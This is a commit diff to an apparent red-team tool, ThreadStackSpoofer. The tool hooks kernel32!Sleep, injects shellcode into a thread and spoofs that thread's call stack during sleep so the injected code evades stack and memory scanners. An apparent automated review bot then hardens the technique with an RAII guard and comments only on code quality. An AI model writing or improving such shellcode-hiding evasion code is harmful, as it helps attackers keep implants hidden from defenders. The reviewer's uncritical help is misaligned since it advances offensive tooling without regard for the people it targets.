
Commit 147fc1e

committed
readme
1 parent 6dd84dd commit 147fc1e


2 files changed

+2
-57
lines changed


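--- a/ThreadStackSpoofer/header.h
+++ b/ThreadStackSpoofer/header.h
@@ -65,10 +65,6 @@ struct StackTraceSpoofingMetadata
 bool initialized;
 CallStackFrame spoofedFrame[MaxStackFramesToSpoof];
 size_t spoofedFrames;
-ULONG_PTR legitTebBaseLow;
-ULONG_PTR legitTebBaseHigh;
-ULONG_PTR origTebBaseLow;
-ULONG_PTR origTebBaseHigh;
 };
 
 struct HookedSleep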

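--- a/ThreadStackSpoofer/main.cpp
+++ b/ThreadStackSpoofer/main.cpp
@@ -11,30 +11,15 @@ void WINAPI MySleep(DWORD _dwMilliseconds)
 const volatile DWORD dwMilliseconds = _dwMilliseconds;
 
 // Perform this (current) thread call stack spoofing.
-//spoofCallStack(true);
+spoofCallStack(true);
 
 log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
 
-PULONG_PTR ptr = (PULONG_PTR)_AddressOfReturnAddress();
-ptr--;
-
-
-Start_Of_TEB* teb = (Start_Of_TEB*)NtCurrentTeb();
-g_stackTraceSpoofing.origTebBaseLow = (ULONG_PTR)teb->StackBase;
-g_stackTraceSpoofing.origTebBaseHigh = (ULONG_PTR)teb->StackLimit;
-
-teb->StackBase = (void*)g_stackTraceSpoofing.legitTebBaseLow;
-teb->StackLimit = (void*)g_stackTraceSpoofing.legitTebBaseHigh;
-
 // Perform sleep emulating originally hooked functionality.
 ::SleepEx(dwMilliseconds, false);
 
-
-teb->StackBase = (void*)g_stackTraceSpoofing.origTebBaseLow;
-teb->StackLimit = (void*)g_stackTraceSpoofing.origTebBaseHigh;
-
 // Restore original thread's call stack.
-//spoofCallStack(false);
+spoofCallStack(false);
 }
 
 bool fastTrampoline(bool installHook, BYTE* addressToHook, LPVOID jumpAddress, HookTrampolineBuffers* buffers /*= NULL*/)
@@ -461,36 +446,6 @@ bool injectShellcode(std::vector<uint8_t>& shellcode, HandlePtr &thread)
 return (NULL != thread.get());
 }
 
-
-void WINAPI _acquireLegitimateThreadStack(LPVOID param)
-{
-Start_Of_TEB* teb = (Start_Of_TEB*)NtCurrentTeb();
-g_stackTraceSpoofing.legitTebBaseLow = (ULONG_PTR)teb->StackBase;
-g_stackTraceSpoofing.legitTebBaseHigh = (ULONG_PTR)teb->StackLimit;
-
-::SleepEx(INFINITE, false);
-}
-
-bool acquireLegitimateThreadStack()
-{
-CallStackFrame frames[MaxStackFramesToSpoof] = { 0 };
-size_t numOfFrames = 0;
-
-HandlePtr secondThread(::CreateThread(
-NULL,
-0,
-//(LPTHREAD_START_ROUTINE)::Sleep,
-(LPTHREAD_START_ROUTINE)_acquireLegitimateThreadStack,
-(LPVOID)INFINITE,
-0,
-0
-), &::CloseHandle);
-
-Sleep(1000);
-
-return true;
-}
-
 int main(int argc, char** argv)
 {
 if (argc < 3)
@@ -518,12 +473,6 @@ int main(int argc, char** argv)
 return 1;
 }
 
-if (!acquireLegitimateThreadStack())
-{
-log("[!] Could not acquire legitimate thread's stack.");
-return 1;
-}
-
 log("[.] Hooking kernel32!Sleep...");
 if (!hookSleep())
 {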
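Review bot: Now that `spoofCallStack(true)` and `spoofCallStack(false)` are live in MySleep, nothing guarantees the restore runs if control leaves the function between them — if `log(...)` (it takes `std::dec`, so it presumably goes through iostreams) can throw, the unwinder would walk frames whose return addresses are still overwritten and the `spoofCallStack(false)` at the end of the hunk would never execute. A small RAII guard keeps the restore on every exit path and makes the pairing explicit; moving the `log` call ahead of the spoof also keeps the logging path off the modified stack. Whether `spoofCallStack` reports failure is not visible here; if it does, the result should be checked before sleeping on a half-patched stack. The commit message "readme" does not describe this hunk, which re-enables spoofing and drops the TEB StackBase/StackLimit experiment.
```cpp
// Restores the spoofed frames on every exit path out of MySleep, including unwinding.
struct ScopedStackSpoof
{
    ScopedStackSpoof()  { spoofCallStack(true); }
    ~ScopedStackSpoof() { spoofCallStack(false); }
};

void WINAPI MySleep(DWORD _dwMilliseconds)
{
    const volatile DWORD dwMilliseconds = _dwMilliseconds;

    log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");

    // Spoof this thread's call stack for the duration of the sleep only.
    ScopedStackSpoof spoof;

    // Perform sleep emulating originally hooked functionality.
    ::SleepEx(dwMilliseconds, false);
}
```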
